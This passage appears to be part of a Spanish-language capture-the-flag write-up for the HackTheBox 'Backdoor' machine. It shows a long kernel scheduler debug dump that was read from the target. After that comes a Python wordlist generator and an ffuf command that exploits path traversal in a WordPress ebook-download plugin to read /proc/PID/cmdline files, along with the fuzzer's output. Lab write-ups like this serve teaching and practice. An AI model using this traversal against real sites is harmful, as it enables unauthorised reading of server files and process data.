 S    migration/0    12        28.038048      1112     0         0.000000        15.792810         0.000000 0 0 /
 S  idle_inject/0    13         0.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 S        cpuhp/0    14      7094.775365         9   120         0.000000         0.061800         0.000000 0 0 /
 I blkcg_punt_bio    80        56.716856         2   100         0.000000         0.004470         0.000000 0 0 /
 S      watchdogd    87         0.000000         2     0         0.000000         0.002610         0.000000 0 0 /
 Secryptfs-kthrea    91       666.202515         2   120         0.000000         0.002420         0.000000 0 0 /
 S  irq/24-pciehp    94         0.000000         2    49         0.000000         0.004730         0.000000 0 0 /
 S  irq/26-pciehp    96         0.000000         2    49         0.000000         0.003460         0.000000 0 0 /
 S  irq/28-pciehp    98         0.000000         2    49         0.000000         0.003600         0.000000 0 0 /
 S  irq/30-pciehp   100         0.000000         2    49         0.000000         0.005110         0.000000 0 0 /
 S  irq/32-pciehp   102         0.000000         2    49         0.000000         0.003470         0.000000 0 0 /
 S  irq/34-pciehp   104         0.000000         2    49         0.000000         0.003370         0.000000 0 0 /
 S  irq/36-pciehp   106         0.000000         2    49         0.000000         0.003380         0.000000 0 0 /
 S  irq/38-pciehp   108         0.000000         2    49         0.000000         0.003410         0.000000 0 0 /
 S  irq/40-pciehp   110         0.000000         2    49         0.000000         0.003440         0.000000 0 0 /
 S  irq/42-pciehp   112         0.000000         2    49         0.000000         0.003390         0.000000 0 0 /
 S  irq/44-pciehp   114         0.000000         2    49         0.000000         0.004310         0.000000 0 0 /
 S  irq/46-pciehp   116         0.000000         2    49         0.000000         0.003310         0.000000 0 0 /
 S  irq/48-pciehp   118         0.000000         2    49         0.000000         0.003810         0.000000 0 0 /
 S  irq/50-pciehp   120         0.000000         2    49         0.000000         0.003330         0.000000 0 0 /
 S  irq/52-pciehp   122         0.000000         2    49         0.000000         0.003260         0.000000 0 0 /
 S  irq/54-pciehp   124         0.000000         2    49         0.000000         0.003390         0.000000 0 0 /
 Iacpi_thermal_pm   126       861.158414         2   100         0.000000         0.003830         0.000000 0 0 /
 Ivfio-irqfd-clea   132       873.201845         2   100         0.000000         0.005030         0.000000 0 0 /
 I  ipv6_addrconf   134       896.342308         2   100         0.000000         0.013510         0.000000 0 0 /
 I kworker/u257:0   146       946.497381         2   100         0.000000         0.013970         0.000000 0 0 /
 I          mpt/0   199      1208.826430         2   100         0.000000         0.008660         0.000000 0 0 /
 S      scsi_eh_2   200      2905.962107        26   120         0.000000         1.031890         0.000000 0 0 /
 S      scsi_eh_3   202      2905.915477        26   120         0.000000         0.939060         0.000000 0 0 /
 S      scsi_eh_4   204      2905.522677        26   120         0.000000         0.502340         0.000000 0 0 /
 I     scsi_tmf_4   205      2675.852160         2   100         0.000000         0.008050         0.000000 0 0 /
 S  irq/16-vmwgfx   207        -1.220909     16491    49         0.000000       306.173480         0.000000 0 0 /
 S      scsi_eh_6   209      2905.911647        26   120         0.000000         0.882070         0.000000 0 0 /
 S      scsi_eh_9   215      2906.006077        26   120         0.000000         0.969400         0.000000 0 0 /
 S     scsi_eh_12   221      2905.989167        26   120         0.000000         0.966980         0.000000 0 0 /
 S     scsi_eh_13   223      2905.952757        26   120         0.000000         0.966650         0.000000 0 0 /
 S     scsi_eh_14   225      2905.543747        26   120         0.000000         0.584700         0.000000 0 0 /
 S     scsi_eh_16   229      2905.983067        26   120         0.000000         0.935600         0.000000 0 0 /
 S     scsi_eh_17   231      2905.484637        26   120         0.000000         0.453000         0.000000 0 0 /
 S     scsi_eh_18   233      2905.968287        26   120         0.000000         0.947200         0.000000 0 0 /
 S     scsi_eh_20   237      2905.912647        26   120         0.000000         0.876900         0.000000 0 0 /
 I    scsi_tmf_22   244      2694.586770         2   100         0.000000         0.009500         0.000000 0 0 /
 I    scsi_tmf_24   263      2726.773872         2   100         0.000000         0.008310         0.000000 0 0 /
 S     scsi_eh_25   266      2905.522407        27   120         0.000000         0.506610         0.000000 0 0 /
 S     scsi_eh_26   270      2905.933967        26   120         0.000000         0.923450         0.000000 0 0 /
 I    scsi_tmf_26   272      2768.968135         2   100         0.000000         0.010760         0.000000 0 0 /
 I    scsi_tmf_27   276      2794.205470         2   100         0.000000         0.008530         0.000000 0 0 /
 S     scsi_eh_29   288      2905.910277        26   120         0.000000         0.895920         0.000000 0 0 /
 I    scsi_tmf_29   289      2854.639701         2   100         0.000000         0.008110         0.000000 0 0 /
 S     scsi_eh_30   292      2906.062467        26   120         0.000000         1.050620         0.000000 0 0 /
 S     scsi_eh_31   294      2905.815461        26   120         0.000000         0.566150         0.000000 0 0 /
 I    scsi_tmf_31   295      2865.658711         2   100         0.000000         0.007290         0.000000 0 0 /
 I    scsi_tmf_32   326      2917.033447         2   100         0.000000         0.007910         0.000000 0 0 /
 I   kworker/0:1H   327     15666.827258      2926   100         0.000000        47.482700         0.000000 0 0 /
 I       kdmflush   340      2968.544087         2   100         0.000000         0.014870         0.000000 0 0 /
 I        raid5wq   373      3079.091931         2   100         0.000000         0.013370         0.000000 0 0 /
 Iext4-rsv-conver   428      3291.327622         2   100         0.000000         0.014530         0.000000 0 0 /
 I         kaluad   651      7130.355762         2   100         0.000000         0.006260         0.000000 0 0 /
 S     multipathd   655         0.000000      4691     0         0.000000        94.699960         0.000000 0 0 /autogroup-24
 S     multipathd   657         0.000000         1     0         0.000000         0.259910         0.000000 0 0 /autogroup-24
 S     multipathd   658         0.000000       133     0         0.000000         4.411800         0.000000 0 0 /autogroup-24
 Ssystemd-timesyn   679       120.995384       483   120         0.000000       132.502110         0.000000 0 0 /autogroup-31
 S   HangDetector   752      1046.948344      4021   120         0.000000        92.978310         0.000000 0 0 /autogroup-36
 Saccounts-daemon   749       549.031179        67   120         0.000000        10.378790         0.000000 0 0 /autogroup-38
 S          gmain   754       561.877519      3831   120         0.000000       165.605480         0.000000 0 0 /autogroup-38
 S          gdbus   889       549.516819        33   120         0.000000         2.167690         0.000000 0 0 /autogroup-38
 S       rsyslogd   771        56.351033        33   120         0.000000         4.958700         0.000000 0 0 /autogroup-44
 S  rs:main Q:Reg   843        65.896163      2230   120         0.000000        79.671530         0.000000 0 0 /autogroup-44
 S             sh   816     24293.837963      7913   120         0.000000      1218.288540         0.000000 0 0 /autogroup-56
 S           sshd   833         0.418626         8   120         0.000000         7.942470         0.000000 0 0 /autogroup-64
 S         screen   906         0.602336        10   120         0.000000         1.120710         0.000000 0 0 /autogroup-75
 S           bash   908        17.903144        52   120         0.000000        18.897880         0.000000 0 0 /autogroup-76
 S         agetty   913        -3.840396        10   120         0.000000         3.330180         0.000000 0 0 /autogroup-84
 S        systemd   917        54.346534       179   120         0.000000        69.018000         0.000000 0 0 /autogroup-77
 S       (sd-pam)   925         3.705450         2   120         0.000000         0.136500         0.000000 0 0 /autogroup-77
 S     ib_io_ibuf   993       771.482680      7745   120         0.000000        69.874120         0.000000 0 0 /autogroup-82
 S      ib_io_log   994       771.476000      7745   120         0.000000        77.792220         0.000000 0 0 /autogroup-82
 S     ib_io_rd-1   995       771.482380      7748   120         0.000000       100.392780         0.000000 0 0 /autogroup-82
 S     ib_io_rd-2   996       771.471220      7745   120         0.000000        81.592840         0.000000 0 0 /autogroup-82
 S     ib_io_rd-3   997       771.483690      7748   120         0.000000       107.643540         0.000000 0 0 /autogroup-82
 S     ib_io_rd-4   998       771.469530      7745   120         0.000000        81.978890         0.000000 0 0 /autogroup-82
 S     ib_io_wr-3  1001       775.934870      7848   120         0.000000       155.501680         0.000000 0 0 /autogroup-82
 S     ib_io_wr-4  1002       775.954690      7824   120         0.000000       142.807080         0.000000 0 0 /autogroup-82
 S ib_log_checkpt  1004       775.574210      3904   120         0.000000       118.354170         0.000000 0 0 /autogroup-82
 S     ib_srv_mon  1031       769.863310       775   120         0.000000        19.776670         0.000000 0 0 /autogroup-82
 S  ib_buf_resize  1032       153.389776         1   120         0.000000         0.028070         0.000000 0 0 /autogroup-82
 S   ib_srv_purge  1046       417.819490      1813   120         0.000000        30.218040         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-1  1047       417.464950       884   120         0.000000        28.941090         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-2  1048       415.492600       775   120         0.000000        25.314770         0.000000 0 0 /autogroup-82
 S        apache2  3160       709.965553       166   120         0.000000        38.611170         0.000000 0 0 /autogroup-78
 S        apache2  4996       691.601983        34   120         0.000000        11.022220         0.000000 0 0 /autogroup-78
 S        apache2  5005       694.699653        34   120         0.000000        10.280060         0.000000 0 0 /autogroup-78
 S        apache2  5020       757.435313        38   120         0.000000        10.067530         0.000000 0 0 /autogroup-78
 I    kworker/0:1  9067     15693.681043      6514   120         0.000000       178.078230         0.000000 0 0 /
 I    kworker/0:2  9921     15262.821923         2   120         0.000000         0.013520         0.000000 0 0 /
 S             su  9951        10.231050        22   120         0.000000         5.851000         0.000000 0 0 /autogroup-63
 S           bash  9959         0.058816         2   120         0.000000         1.272740         0.000000 0 0 /autogroup-97
 S      gdbserver  9960         5.262882        12   120         0.000000         1.577490         0.000000 0 0 /autogroup-97

cpu#1, 2000.000 MHz
  .nr_running                    : 1
  .nr_switches                   : 542769
  .nr_load_updates               : 0
  .nr_uninterruptible            : -2
  .next_balance                  : 4295.864258
  .curr->pid                     : 5001
  .clock                         : 3888056.353640
  .clock_task                    : 3888056.353640
  .avg_idle                      : 1000000
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/autogroup-82
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2106.837584
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -13592.677659
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 4
  .runnable_load_avg             : 0
  .util_avg                      : 1
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 4
  .tg_load_avg                   : 4
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888048.089570
  .se->vruntime                  : 20252.850533
  .se->sum_exec_runtime          : 4045.453630
  .se->load.weight               : 1048576
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 2
  .se->avg.util_avg              : 1
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-36
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 2916.185737
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -12783.329506
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888035.356290
  .se->vruntime                  : 20251.725401
  .se->sum_exec_runtime          : 2903.749010
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/autogroup-78
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 498.994326
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15200.520917
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 3888056.353640
  .se->vruntime                  : 20251.242381
  .se->sum_exec_runtime          : 1039.882000
  .se->load.weight               : 1048576
  .se->runnable_weight           : 1048576
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 20257.185281
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 4557.670038
  .nr_spread_over                : 0
  .nr_running                    : 1
  .load                          : 1048576
  .runnable_weight               : 1048576
  .load_avg                      : 4
  .runnable_load_avg             : 0
  .util_avg                      : 5
  .util_est_enqueued             : 11
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.000000
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       515.963755      3001   120         0.000000      1436.402490         0.000000 0 0 /autogroup-2
 S       kthreadd     2     19854.750146       289   120         0.000000         3.772400         0.000000 0 0 /
 S        cpuhp/1    15      9619.140921         9   120         0.000000         0.131560         0.000000 0 0 /
 S  idle_inject/1    16        -3.000000         3    49         0.000000         0.001350         0.000000 0 0 /
 S    migration/1    17         0.000000      1091     0         0.000000       148.375764         0.000000 0 0 /
 S    ksoftirqd/1    18     20251.198161      1038   120         0.000000        37.858230         0.000000 0 0 /
 I   kworker/1:0H    20      4553.468099         5   100         0.000000         0.017200         0.000000 0 0 /
 S      kdevtmpfs    21      9720.593273       188   120         0.000000         1.921670         0.000000 0 0 /
 I          netns    22         2.951423         2   100         0.000000         0.000000         0.000000 0 0 /
 Srcu_tasks_kthre    23         2.951423         2   120         0.000000         0.000000         0.000000 0 0 /
 S        kauditd    24      9690.553996         9   120         0.000000         0.118720         0.000000 0 0 /
 S     khungtaskd    27     20234.026555        34   120         0.000000         6.054490         0.000000 0 0 /
 S     oom_reaper    28        26.964921         2   120         0.000000         0.000000         0.000000 0 0 /
 I      writeback    29        32.966058         2   100         0.000000         0.002100         0.000000 0 0 /
 S     kcompactd0    30        38.968365         2   120         0.000000         0.002310         0.000000 0 0 /
 S           ksmd    31        44.968362         2   125         0.000000         0.000000         0.000000 0 0 /
 S     khugepaged    32        50.968359         2   139         0.000000         0.000000         0.000000 0 0 /
 I    kintegrityd    78       326.968551         2   100         0.000000         0.000000         0.000000 0 0 /
 I        kblockd    79       332.968548         2   100         0.000000         0.000000         0.000000 0 0 /
 I     tpm_dev_wq    82       358.716306         2   100         0.000000         0.031320         0.000000 0 0 /
 I        ata_sff    83       362.724055         2   100         0.000000         0.007750         0.000000 0 0 /
 I             md    84       366.732684         2   100         0.000000         0.008630         0.000000 0 0 /
 I    edac-poller    85       370.739303         2   100         0.000000         0.006620         0.000000 0 0 /
 I     devfreq_wq    86       374.739302         2   100         0.000000         0.000000         0.000000 0 0 /
 S        kswapd0    90       401.046925         3   120         0.000000         0.070100         0.000000 0 0 /
 I       kthrotld    93       390.954901         2   100         0.000000         0.013470         0.000000 0 0 /
 S  irq/25-pciehp    95         0.000000         3    49         0.000000         0.031150         0.000000 0 0 /
 S  irq/27-pciehp    97         0.000000         3    49         0.000000         0.021510         0.000000 0 0 /
 S  irq/29-pciehp    99         0.000000         3    49         0.000000         0.028840         0.000000 0 0 /
 S  irq/31-pciehp   101         0.000000         3    49         0.000000         0.031140         0.000000 0 0 /
 S  irq/33-pciehp   103         0.000000         3    49         0.000000         0.031390         0.000000 0 0 /
 S  irq/35-pciehp   105         0.000000         3    49         0.000000         0.013310         0.000000 0 0 /
 S  irq/37-pciehp   107         0.000000         3    49         0.000000         0.031890         0.000000 0 0 /
 S  irq/39-pciehp   109         0.000000         3    49         0.000000         0.008530         0.000000 0 0 /
 S  irq/41-pciehp   111         0.000000         3    49         0.000000         0.050030         0.000000 0 0 /
 S  irq/43-pciehp   113         0.000000         3    49         0.000000         0.051050         0.000000 0 0 /
 S  irq/45-pciehp   115         0.000000         3    49         0.000000         0.050270         0.000000 0 0 /
 S  irq/47-pciehp   117         0.000000         3    49         0.000000         0.072440         0.000000 0 0 /
 S  irq/49-pciehp   119         0.000000         3    49         0.000000         0.051010         0.000000 0 0 /
 S  irq/51-pciehp   121         0.000000         3    49         0.000000         0.032410         0.000000 0 0 /
 S  irq/53-pciehp   123         0.000000         3    49         0.000000         0.022460         0.000000 0 0 /
 S  irq/55-pciehp   125         0.000000         3    49         0.000000         0.031860         0.000000 0 0 /
 S      scsi_eh_0   127       472.147675         4   120         0.000000        10.972120         0.000000 0 0 /
 I     scsi_tmf_0   128       398.998831         2   100         0.000000         0.022290         0.000000 0 0 /
 S      scsi_eh_1   129       472.809105         4   120         0.000000        11.499780         0.000000 0 0 /
 I     scsi_tmf_1   130       407.036405         2   100         0.000000         0.019230         0.000000 0 0 /
 I          kstrp   143       432.652467         2   100         0.000000         0.005730         0.000000 0 0 /
 Icharger_manager   159       467.633525         2   100         0.000000         0.007620         0.000000 0 0 /
 I     mpt_poll_0   198       914.433987         2   100         0.000000         0.099680         0.000000 0 0 /
 I     scsi_tmf_2   201      3114.035121         2   100         0.000000         0.005700         0.000000 0 0 /
 I     scsi_tmf_3   203      3128.384402         2   100         0.000000         0.005400         0.000000 0 0 /
 S      scsi_eh_5   206      3467.476374        26   120         0.000000         1.451290         0.000000 0 0 /
 I     scsi_tmf_5   208      3158.649153         2   100         0.000000         0.002970         0.000000 0 0 /
 I     scsi_tmf_6   210      3166.650961         2   100         0.000000         0.002810         0.000000 0 0 /
 S      scsi_eh_7   211      3466.911274        26   120         0.000000         0.836640         0.000000 0 0 /
 I     scsi_tmf_7   212      3174.652726         2   100         0.000000         0.002290         0.000000 0 0 /
 S      scsi_eh_8   213      3466.962144        26   120         0.000000         0.886470         0.000000 0 0 /
 I     scsi_tmf_8   214      3182.654224         2   100         0.000000         0.002140         0.000000 0 0 /
 I     scsi_tmf_9   216      3190.655821         2   100         0.000000         0.002140         0.000000 0 0 /
 S     scsi_eh_10   217      3467.074194        26   120         0.000000         1.008860         0.000000 0 0 /
 I    scsi_tmf_10   218      3198.657329         2   100         0.000000         0.002110         0.000000 0 0 /
 S     scsi_eh_11   219      3466.967024        26   120         0.000000         0.901040         0.000000 0 0 /
 I    scsi_tmf_11   220      3206.658897         2   100         0.000000         0.002130         0.000000 0 0 /
 I    scsi_tmf_12   222      3214.660445         2   100         0.000000         0.002120         0.000000 0 0 /
 I    scsi_tmf_13   224      3222.661942         2   100         0.000000         0.002040         0.000000 0 0 /
 I    scsi_tmf_14   226      3230.663401         2   100         0.000000         0.002050         0.000000 0 0 /
 S     scsi_eh_15   227      3467.015954        26   120         0.000000         0.996090         0.000000 0 0 /
 I    scsi_tmf_15   228      3238.664819         2   100         0.000000         0.001960         0.000000 0 0 /
 I    scsi_tmf_16   230      3246.666336         2   100         0.000000         0.002000         0.000000 0 0 /
 I    scsi_tmf_17   232      3254.667794         2   100         0.000000         0.002000         0.000000 0 0 /
 I    scsi_tmf_18   234      3262.669353         2   100         0.000000         0.002160         0.000000 0 0 /
 S     scsi_eh_19   235      3466.967814        26   120         0.000000         0.936320         0.000000 0 0 /
 I    scsi_tmf_19   236      3270.670931         2   100         0.000000         0.002170         0.000000 0 0 /
 I    scsi_tmf_20   238      3278.672519         2   100         0.000000         0.002240         0.000000 0 0 /
 S     scsi_eh_21   239      3467.008954        26   120         0.000000         0.930060         0.000000 0 0 /
 I    scsi_tmf_21   240      3286.674600         2   100         0.000000         0.002950         0.000000 0 0 /
 S     scsi_eh_22   241      3466.984654        26   120         0.000000         0.982770         0.000000 0 0 /
 I       ttm_swap   242      3290.676642         2   100         0.000000         0.005410         0.000000 0 0 /
 I         cryptd   243      3294.171350         2   100         0.000000         0.008490         0.000000 0 0 /
 S     scsi_eh_23   250      3467.389594        26   120         0.000000         1.343560         0.000000 0 0 /
 I    scsi_tmf_23   254      3307.976469         2   100         0.000000         0.009540         0.000000 0 0 /
 S     scsi_eh_24   257      3466.983274        26   120         0.000000         0.940400         0.000000 0 0 /
 I    scsi_tmf_25   268      3325.170472         2   100         0.000000         0.007550         0.000000 0 0 /
 S     scsi_eh_27   274      3466.932984        26   120         0.000000         0.870440         0.000000 0 0 /
 S     scsi_eh_28   278      3466.988974        26   120         0.000000         0.954740         0.000000 0 0 /
 I    scsi_tmf_28   286      3360.887236         2   100         0.000000         0.009770         0.000000 0 0 /
 I    scsi_tmf_30   293      3368.480111         2   100         0.000000         0.003280         0.000000 0 0 /
 S     scsi_eh_32   325      3478.167941         2   120         0.000000         0.006600         0.000000 0 0 /
 I   kworker/1:1H   334     20251.185475      4398   100         0.000000       666.837070         0.000000 0 0 /
 I       kdmflush   342      4590.426086         2   100         0.000000         0.010790         0.000000 0 0 /
 S    jbd2/dm-0-8   427     20251.354481      3868   120         0.000000       683.110790         0.000000 0 0 /
 Ssystemd-journal   485       364.094600      3805   119         0.000000      1035.144760         0.000000 0 0 /autogroup-3
 S  systemd-udevd   512      1579.887951      2094   120         0.000000       650.154970         0.000000 0 0 /autogroup-15
 Ssystemd-network   528        22.064344       326   120         0.000000        64.087450         0.000000 0 0 /autogroup-17
 I   kmpath_rdacd   652      9654.587837         2   100         0.000000         0.009190         0.000000 0 0 /
 I        kmpathd   653      9658.599931         2   100         0.000000         0.013460         0.000000 0 0 /
 Ikmpath_handlerd   654      9662.609687         2   100         0.000000         0.010420         0.000000 0 0 /
 S     multipathd   656         0.000000       779     0         0.000000        24.616000         0.000000 0 0 /autogroup-24
 S     multipathd   659         0.000000      6115     0         0.000000      1344.361900         0.000000 0 0 /autogroup-24
 S     multipathd   660         0.000000         4     0         0.000000         3.713240         0.000000 0 0 /autogroup-24
 S     multipathd   661         0.000000         5     0         0.000000         0.215580         0.000000 0 0 /autogroup-24
 S    jbd2/sda2-8   663     16959.254078        17   120         0.000000         0.342370         0.000000 0 0 /
 Iext4-rsv-conver   664      9671.055457         2   100         0.000000         0.012670         0.000000 0 0 /
 Ssystemd-resolve   678       225.642944       970   120         0.000000       392.510760         0.000000 0 0 /autogroup-30
 S     sd-resolve   748       123.287787      1557   120         0.000000       167.656340         0.000000 0 0 /autogroup-31
 S  VGAuthService   688        11.177426        89   120         0.000000        12.465580         0.000000 0 0 /autogroup-35
 S       vmtoolsd   696      2916.185737     45131   120         0.000000      2840.781290         0.000000 0 0 /autogroup-36
 S       vmtoolsd   753      1197.191827       145   120         0.000000         1.027820         0.000000 0 0 /autogroup-36
 S          gmain   761      1197.192497       148   120         0.000000         1.354780         0.000000 0 0 /autogroup-36
 S    dbus-daemon   750        10.901464       395   120         0.000000        39.923820         0.000000 0 0 /autogroup-37
 S     irqbalance   763       171.113584       400   120         0.000000       736.259240         0.000000 0 0 /autogroup-41
 S          gmain   840         5.941204         1   120         0.000000         0.051770         0.000000 0 0 /autogroup-41
 Snetworkd-dispat   770        24.195854       365   120         0.000000        86.311880         0.000000 0 0 /autogroup-42
 S    in:imuxsock   841        63.580682      1934   120         0.000000        82.897890         0.000000 0 0 /autogroup-44
 S      in:imklog   842         3.139038         5   120         0.000000         2.576600         0.000000 0 0 /autogroup-44
 S systemd-logind   772        51.358314       351   120         0.000000        57.054520         0.000000 0 0 /autogroup-43
 S           cron   795        23.236217        84   120         0.000000         8.922890         0.000000 0 0 /autogroup-53
 S           cron   797         4.951889        22   120         0.000000         2.347230         0.000000 0 0 /autogroup-53
 S           cron   798         4.063958        28   120         0.000000         1.866590         0.000000 0 0 /autogroup-53
 S             sh   822         6.096762         3   120         0.000000         0.875700         0.000000 0 0 /autogroup-63
 S            atd   831         0.698262         5   120         0.000000         1.947490         0.000000 0 0 /autogroup-65
 S        apache2   919       498.994326      3952   120         0.000000       199.204200         0.000000 0 0 /autogroup-78
 S        polkitd   952         0.967613        45   120         0.000000         6.252250         0.000000 0 0 /autogroup-79
 S          gmain   957         0.219552         2   120         0.000000         0.054380         0.000000 0 0 /autogroup-79
 S          gdbus   959         2.391570        30   120         0.000000         2.256970         0.000000 0 0 /autogroup-79
 S         mysqld   982      1454.947024       201   120         0.000000       950.670570         0.000000 0 0 /autogroup-82
 S     ib_io_wr-1   999      2100.835614      7802   120         0.000000       141.530410         0.000000 0 0 /autogroup-82
 S     ib_io_wr-2  1000      2100.819574      7817   120         0.000000        98.355950         0.000000 0 0 /autogroup-82
 S ib_pg_flush_co  1003      2100.851074      4025   120         0.000000       142.333740         0.000000 0 0 /autogroup-82
 Sib_log_fl_notif  1005      2106.837584     39322   120         0.000000       730.203500         0.000000 0 0 /autogroup-82
 S   ib_log_flush  1006      2100.856484     39442   120         0.000000       511.413710         0.000000 0 0 /autogroup-82
 Sib_log_wr_notif  1007      2100.843974     39318   120         0.000000       684.086800         0.000000 0 0 /autogroup-82
 S  ib_log_writer  1008      2100.847394     39350   120         0.000000       516.739660         0.000000 0 0 /autogroup-82
 S ib_srv_lock_to  1029      2100.811394      3874   120         0.000000        82.384720         0.000000 0 0 /autogroup-82
 S ib_srv_err_mon  1030      2100.798264      3873   120         0.000000        77.534820         0.000000 0 0 /autogroup-82
 S    ib_src_main  1033      2100.626584      3874   120         0.000000       259.413790         0.000000 0 0 /autogroup-82
 S  ib_dict_stats  1034      2100.175464       388   120         0.000000        10.692290         0.000000 0 0 /autogroup-82
 S     ib_fts_opt  1035      2100.178374       776   120         0.000000        22.133930         0.000000 0 0 /autogroup-82
 S   xpl_worker-1  1038      2093.646894        65   120         0.000000         1.523890         0.000000 0 0 /autogroup-82
 S   xpl_worker-2  1039      2093.665384        65   120         0.000000         0.924880         0.000000 0 0 /autogroup-82
 S   xpl_accept-1  1040      1256.510815         3   120         0.000000         0.024590         0.000000 0 0 /autogroup-82
 S    ib_buf_dump  1044      1224.615357         4   120         0.000000         0.996910         0.000000 0 0 /autogroup-82
 S  ib_clone_gtid  1045      2100.849224     38720   120         0.000000       680.801160         0.000000 0 0 /autogroup-82
 S   ib_srv_wkr-3  1049      1473.419354       381   120         0.000000        16.402710         0.000000 0 0 /autogroup-82
 S      evt_sched  1050      1258.486107         1   120         0.000000         0.555790         0.000000 0 0 /autogroup-82
 S    sig_handler  1051      1272.678439         4   120         0.000000         0.045260         0.000000 0 0 /autogroup-82
 S   xpl_accept-2  1052      2100.673274      4341   120         0.000000       135.306180         0.000000 0 0 /autogroup-82
 S       gtid_zip  1054      1272.680619         2   120         0.000000         0.173790         0.000000 0 0 /autogroup-82
 S     connection  2745      1456.449824       263   120         0.000000        77.094580         0.000000 0 0 /autogroup-82
 S     connection  2746      1466.696594       424   120         0.000000        67.397070         0.000000 0 0 /autogroup-82
 I kworker/u256:1  3732     20245.186725      8034   120         0.000000       172.354130         0.000000 0 0 /
 I    kworker/1:0  4547     19860.864803     12140   120         0.000000       724.512030         0.000000 0 0 /
 S        apache2  4991       487.566296        35   120         0.000000        14.617150         0.000000 0 0 /autogroup-78
>R        apache2  5001       492.994326        27   120         0.000000        10.675610         0.000000 0 0 /autogroup-78
 S        apache2  5002       487.564526        29   120         0.000000        11.517980         0.000000 0 0 /autogroup-78
 S        apache2  5006       493.332166        28   120         0.000000         8.924860         0.000000 0 0 /autogroup-78
 S        apache2  5015       487.958556        25   120         0.000000        10.375860         0.000000 0 0 /autogroup-78
 S        apache2  5027       487.279166        25   120         0.000000         7.637470         0.000000 0 0 /autogroup-78
 I    kworker/1:2  9006     20252.373780      6044   120         0.000000       396.762240         0.000000 0 0 /
 I kworker/u256:0  9394     20251.282761      1351   120         0.000000        25.784370         0.000000 0 0 /
 t           true  9964        11.181754         5   120         0.000000         0.892650         0.000000 0 0 /autogroup-97
 I    kworker/1:1  9970     19866.729543         2   120         0.000000         0.002290         0.000000 0 0 /
 S          sleep 10722     30630.204671         1   120         0.000000         0.702920         0.000000 0 0 /autogroup-56

<script>window.close()</script>%                                                                                                                                            π ~/htb/backdoor ❯

Creamos un wordlist para enumerar los procesos a los cuales podemos acceder a /proc/{pid}/cmdline para ver si encontramos informacion interesante.

1

python -c "for i in range(0,10001): print('/proc/'+str(i)+'/cmdline')" > proc_list.txt

Tras ejecutar ffuf vemos una lista de archivos cmdline.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

 π ~/htb/backdoor ❯ ffuf -c -w proc_list.txt -u "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ" -fw 1

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../../FUZZ
 :: Wordlist         : FUZZ: proc_list.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 1
________________________________________________

/proc/816/cmdline       [Status: 200, Size: 273, Words: 12, Lines: 1]
/proc/822/cmdline       [Status: 200, Size: 271, Words: 11, Lines: 1]
/proc/833/cmdline       [Status: 200, Size: 228, Words: 8, Lines: 1]
